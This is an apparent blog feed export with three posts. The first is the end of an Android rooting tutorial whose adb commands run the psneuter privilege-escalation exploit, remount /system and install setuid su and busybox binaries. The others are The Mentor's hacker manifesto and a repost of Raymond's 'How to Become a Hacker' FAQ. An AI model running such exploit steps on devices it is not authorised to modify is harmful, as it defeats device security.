&lt;div id=&quot;post_message_94616&quot; style=&quot;text-align: left;&quot;&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;adb devices&lt;/li&gt;
&lt;li&gt;adb push psneuter /data/local/tmp&lt;/li&gt;
&lt;li&gt;adb shell&lt;/li&gt;
&lt;li&gt;$ cd /data/local/tmp&lt;/li&gt;
&lt;li&gt;$ chmod 777 psneuter&lt;/li&gt;
&lt;li&gt;$ ./psneuter&lt;/li&gt;
&lt;/ul&gt;
At this point, the exploit will run and close the shell. You will need to run these commands to restart the ADB server.&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot; style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot; style=&quot;text-align: left;&quot;&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;adb kill-server&lt;/li&gt;
&lt;li&gt;adb devices&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
It all depends on the next command. Use the&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;adb shell&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
command to open a shell. If you see a &quot;#&quot; sign, you have root access, so go ahead and continue to the next part of this tutorial. If not, you can go back and try the previous steps again, or ask for help in the comments.&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
We now need to make this root permanent. From the root shell you just opened, type the following commands.&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;# mount -o remount,rw -t rfs /dev/block/st19 /system&lt;/li&gt;
&lt;li&gt;# exit&lt;/li&gt;
&lt;li&gt;adb push busybox /system/bin&lt;/li&gt;
&lt;li&gt;adb push su /system/bin&lt;/li&gt;
&lt;li&gt;adb install Superuser.apk&lt;/li&gt;
&lt;li&gt;adb shell&lt;/li&gt;
&lt;li&gt;# chmod 4755 /system/bin/busybox&lt;/li&gt;
&lt;li&gt;# chmod 4755 /system/bin/su&lt;/li&gt;
&lt;li&gt;# mount -o remount,ro -t rfs /dev/block/st19 /system&lt;/li&gt;
&lt;li&gt;# exit&lt;/li&gt;
&lt;li&gt;adb reboot&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;b&gt;Now your device should reboot now and you should have SuperUser app in icon drawer, you should now use a root only app such as Root Checker.&lt;/b&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;b&gt;If you have Any problems tell me in the comments and if you want me to help you in another problem may it be related to android or anything else tell me in the comments and I will surely reply.&lt;/b&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;b&gt;By M.Seljuk Khan who should have been too lazy to write this and does not take any credit for the files used.&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/693623408257395225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/how-to-root-any-android-manually-no.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/693623408257395225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/693623408257395225'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/how-to-root-any-android-manually-no.html' title='How To Root Any Android Manually '/><author><name>TheKingOfEmAll</name><uri>http://www.blogger.com/profile/18003915218562093391</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='23' height='32' src='http://2.bp.blogspot.com/-p_iX0mZmqhQ/Ueki9hsAo_I/AAAAAAAAAT8/gkwKOC_Ewfo/s220/tumblr_mohaopxcFE1svd9olo1_1280.jpg'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-6867058261638422673</id><published>2013-07-18T04:12:00.001-07:00</published><updated>2013-07-19T05:55:35.025-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="others"/><title type='text'>The hacker menifesto</title><content type='html'>&lt;span style=&quot;color: #990000; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;A sort of poem-like paragraph from which I get inspiration&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center; text-indent: 50px;&quot;&gt;
&lt;i&gt;&lt;b&gt;\/\The Conscience of a Hacker/\/&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;by&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;+++The Mentor+++&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Written on January 8, 1986&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Another one got caught today, it&#39;s all over the papers. &quot;Teenager&lt;br /&gt;
Arrested in Computer Crime Scandal&quot;, &quot;Hacker Arrested after Bank Tampering&quot;...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Damn kids. They&#39;re all alike.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
&lt;a href=&quot;http://behance.vo.llnwd.net/profiles24/335751/projects/1043481/7694e25924687daa913b4b34faff9d98.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://behance.vo.llnwd.net/profiles24/335751/projects/1043481/7694e25924687daa913b4b34faff9d98.jpg&quot; /&gt;&lt;/a&gt;But did you, in your three-piece psychology and 1950&#39;s technobrain,&lt;br /&gt;
ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
I am a hacker, enter my world...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Mine is a world that begins with school... I&#39;m smarter than most of the other kids, this crap they teach us bores me...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Damn underachiever. They&#39;re all alike.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
I&#39;m in junior high or high school. I&#39;ve listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. &quot;No, Ms. Smith, I didn&#39;t show my work. I did it in my head...&quot;&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Damn kid. Probably copied it. They&#39;re all alike.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it&#39;s because I screwed it up. Not because it doesn&#39;t like me...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Or feels threatened by me...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Or thinks I&#39;m a smart ass...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Or doesn&#39;t like teaching and shouldn&#39;t be here...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Damn kid. All he does is play games. They&#39;re all alike.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict&#39;s veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
&quot;This is it... this is where I belong...&quot;&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
I know everyone here... even if I&#39;ve never met them, never talked to them, may never hear from them again... I know you all...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Damn kid. Tying up the phone line again. They&#39;re all alike...&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
You bet your ass we&#39;re all alike... we&#39;ve been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We&#39;ve been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn&#39;t run by profiteering gluttons, and you call us criminals.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it&#39;s for our own good, yet we&#39;re the criminals.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.&lt;/div&gt;
&lt;div style=&quot;text-indent: 50px;&quot;&gt;
I am a hacker, and this is my manifesto. You may stop this individual, but you can&#39;t stop us all... after all, we&#39;re all alike.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/6867058261638422673/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/the-hacker-menifesto.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/6867058261638422673'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/6867058261638422673'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/the-hacker-menifesto.html' title='The hacker menifesto'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-5707057584462976674</id><published>2013-07-18T02:02:00.000-07:00</published><updated>2013-07-20T08:13:57.913-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>Hacking history / FAQ</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
HACKING FAQ and History&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&amp;nbsp;&lt;a href=&quot;http://www.londonscreenwritersfestival.com/assets/faq_red__large.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://www.londonscreenwritersfestival.com/assets/faq_red__large.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you&#39;re a hacker.&lt;br /&gt;
&lt;br /&gt;
The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.&lt;br /&gt;
&lt;br /&gt;
There is another group of people who loudly call themselves hackers, but aren&#39;t. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn&#39;t make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.&lt;br /&gt;
&lt;br /&gt;
The basic difference is this: hackers build things, crackers break them.&lt;br /&gt;
&lt;br /&gt;
If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren&#39;t as smart as you think you are. And that&#39;s all I&#39;m going to say about crackers.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Hacker Attitude&lt;br /&gt;
&lt;br /&gt;
1. The world is full of fascinating problems waiting to be solved.&lt;br /&gt;
2. No problem should ever have to be solved twice.&lt;br /&gt;
3. Boredom and drudgery are evil.&lt;br /&gt;
4. Freedom is good.&lt;br /&gt;
5. Attitude is no substitute for competence.&lt;br /&gt;
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.&lt;br /&gt;
&lt;br /&gt;
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you&#39;ll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.&lt;br /&gt;
&lt;br /&gt;
Or, as the following modern Zen poem has it:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; To follow the path:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; look to the master,&lt;br /&gt;
&amp;nbsp; &amp;nbsp; follow the master,&lt;br /&gt;
&amp;nbsp; &amp;nbsp; walk with the master,&lt;br /&gt;
&amp;nbsp; &amp;nbsp; see through the master,&lt;br /&gt;
&amp;nbsp; &amp;nbsp; become the master.&lt;br /&gt;
So, if you want to be a hacker, repeat the following things until you believe them:&lt;br /&gt;
&lt;br /&gt;
1. The world is full of fascinating problems waiting to be solved.&lt;br /&gt;
&lt;br /&gt;
Being a hacker is lots of fun, but it&#39;s a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.&lt;br /&gt;
&lt;br /&gt;
If you aren&#39;t the kind of person that feels this way naturally, you&#39;ll need to become one in order to make it as a hacker. Otherwise you&#39;ll find your hacking energy is sapped by distractions like sex, money, and social approval.&lt;br /&gt;
&lt;br /&gt;
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you&#39;ll learn enough to solve the next piece — and so on, until you&#39;re done.)&lt;br /&gt;
&lt;br /&gt;
2. No problem should ever have to be solved twice.&lt;br /&gt;
&lt;br /&gt;
Creative brains are a valuable, limited resource. They shouldn&#39;t be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.&lt;br /&gt;
&lt;br /&gt;
To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it&#39;s almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.&lt;br /&gt;
&lt;br /&gt;
Note, however, that &quot;No problem should ever have to be solved twice.&quot; does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn&#39;t know before by studying the first cut at a solution. It&#39;s OK, and often necessary, to decide that we can do better. What&#39;s not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.&lt;br /&gt;
&lt;br /&gt;
(You don&#39;t have to believe that you&#39;re obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It&#39;s consistent with hacker values to sell enough of it to keep you in food and rent and computers. It&#39;s fine to use your hacking skills to support a family or even get rich, as long as you don&#39;t forget your loyalty to your art and your fellow hackers while doing it.)&lt;br /&gt;
&lt;br /&gt;
3. Boredom and drudgery are evil.&lt;br /&gt;
&lt;br /&gt;
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren&#39;t doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.&lt;br /&gt;
&lt;br /&gt;
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).&lt;br /&gt;
&lt;br /&gt;
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can&#39;t have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)&lt;br /&gt;
&lt;br /&gt;
4. Freedom is good.&lt;br /&gt;
&lt;br /&gt;
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you&#39;re being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.&lt;br /&gt;
&lt;br /&gt;
(This isn&#39;t the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that&#39;s a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)&lt;br /&gt;
&lt;br /&gt;
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.&lt;br /&gt;
&lt;br /&gt;
5. Attitude is no substitute for competence.&lt;br /&gt;
&lt;br /&gt;
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won&#39;t make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.&lt;br /&gt;
&lt;br /&gt;
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won&#39;t let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.&lt;br /&gt;
&lt;br /&gt;
If you revere competence, you&#39;ll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Basic Hacking Skills&lt;br /&gt;
&lt;br /&gt;
1. Learn how to program.&lt;br /&gt;
2. Get one of the open-source Unixes and learn to use and run it.&lt;br /&gt;
3. Learn how to use the World Wide Web and write HTML.&lt;br /&gt;
4. If you don&#39;t have functional English, learn it.&lt;br /&gt;
The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there&#39;s a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.&lt;br /&gt;
&lt;br /&gt;
This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn&#39;t until recently involve HTML. But right now it pretty clearly includes the following:&lt;br /&gt;
&lt;br /&gt;
1. Learn how to program.&lt;br /&gt;
&lt;br /&gt;
This, of course, is the fundamental hacking skill. If you don&#39;t know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.&lt;br /&gt;
&lt;br /&gt;
I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.&lt;br /&gt;
&lt;br /&gt;
There is perhaps a more general point here. If a language does too much for you, it may be simultaneously a good tool for production and a bad one for learning. It&#39;s not only languages that have this problem; web application frameworks like RubyOnRails, CakePHP, Django may make it too easy to reach a superficial sort of understanding that will leave you without resources when you have to tackle a hard problem, or even just debug the solution to an easy one.&lt;br /&gt;
&lt;br /&gt;
If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.&lt;br /&gt;
&lt;br /&gt;
C is very efficient, and very sparing of your machine&#39;s resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today&#39;s machines as powerful as they are, this is usually a bad tradeoff — it&#39;s smarter to use a language that uses the machine&#39;s time less efficiently, but your time much more efficiently. Thus, Python.&lt;br /&gt;
&lt;br /&gt;
Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it&#39;s very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don&#39;t require C&#39;s machine efficiency. You will need to be able to understand their code.&lt;br /&gt;
&lt;br /&gt;
LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)&lt;br /&gt;
&lt;br /&gt;
It&#39;s best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.&lt;br /&gt;
&lt;br /&gt;
But be aware that you won&#39;t reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what&#39;s in the manual to what you already know. This means you should learn several very different languages.&lt;br /&gt;
&lt;br /&gt;
I can&#39;t give complete instructions on how to learn to program here — it&#39;s a complex skill. But I can tell you that books and courses won&#39;t do it — many, maybe most of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.&lt;br /&gt;
&lt;br /&gt;
Peter Norvig, who is one of Google&#39;s top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His &quot;recipe for programming success&quot; is worth careful attention.&lt;br /&gt;
&lt;br /&gt;
Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.&lt;br /&gt;
&lt;br /&gt;
Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...&lt;br /&gt;
&lt;br /&gt;
2. Get one of the open-source Unixes and learn to use and run it.&lt;br /&gt;
&lt;br /&gt;
I&#39;ll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it.&lt;br /&gt;
&lt;br /&gt;
Yes, there are other operating systems in the world besides Unix. But they&#39;re distributed in binary — you can&#39;t read the code, and you can&#39;t modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.&lt;br /&gt;
&lt;br /&gt;
Under Mac OS X it&#39;s possible, but only part of the system is open source — you&#39;re likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple&#39;s proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.&lt;br /&gt;
&lt;br /&gt;
Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can&#39;t be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn&#39;t always true, and some old-time hackers still aren&#39;t happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft&#39;s muscle doesn&#39;t seem able to seriously dent it.)&lt;br /&gt;
&lt;br /&gt;
So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You&#39;ll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you&#39;ll have fun, and you&#39;ll soak up more knowledge than you realize you&#39;re learning until you look back on it as a master hacker.&lt;br /&gt;
&lt;br /&gt;
For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.&lt;br /&gt;
&lt;br /&gt;
To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.&lt;br /&gt;
&lt;br /&gt;
During the first ten years of this HOWTO&#39;s life, I reported that from a new user&#39;s point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies. Beware, though, of the hideous and nigh-unusable &quot;Unity&quot; desktop interface that Ubuntu introduced as a default a few years later; the Xubuntu or Kubuntu variants are better.&lt;br /&gt;
&lt;br /&gt;
You can find BSD Unix help and resources at www.bsd.org.&lt;br /&gt;
&lt;br /&gt;
A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it&#39;s a way to get a look at the possibilities without having to do anything drastic.&lt;br /&gt;
&lt;br /&gt;
I have written a primer on the basics of Unix and the Internet.&lt;br /&gt;
&lt;br /&gt;
I used to recommend against installing either Linux or BSD as a solo project if you&#39;re a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user&#39;s group and asking for help. It can&#39;t hurt, and may smooth the process.&lt;br /&gt;
&lt;br /&gt;
3. Learn how to use the World Wide Web and write HTML.&lt;br /&gt;
&lt;br /&gt;
Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.&lt;br /&gt;
&lt;br /&gt;
This doesn&#39;t just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web&#39;s markup language. If you don&#39;t know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here&#39;s one.)&lt;br /&gt;
&lt;br /&gt;
But just having a home page isn&#39;t anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).&lt;br /&gt;
&lt;br /&gt;
To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic...&lt;br /&gt;
&lt;br /&gt;
4. If you don&#39;t have functional English, learn it.&lt;br /&gt;
&lt;br /&gt;
As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.&lt;br /&gt;
&lt;br /&gt;
Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).&lt;br /&gt;
&lt;br /&gt;
Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It&#39;s an example worth following.&lt;br /&gt;
&lt;br /&gt;
Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we&#39;ve generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can&#39;t yet write competently, learn to.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Status in the Hacker Culture&lt;br /&gt;
&lt;br /&gt;
1. Write open-source software&lt;br /&gt;
2. Help test and debug open-source software&lt;br /&gt;
3. Publish useful information&lt;br /&gt;
4. Help keep the infrastructure working&lt;br /&gt;
5. Serve the hacker culture itself&lt;br /&gt;
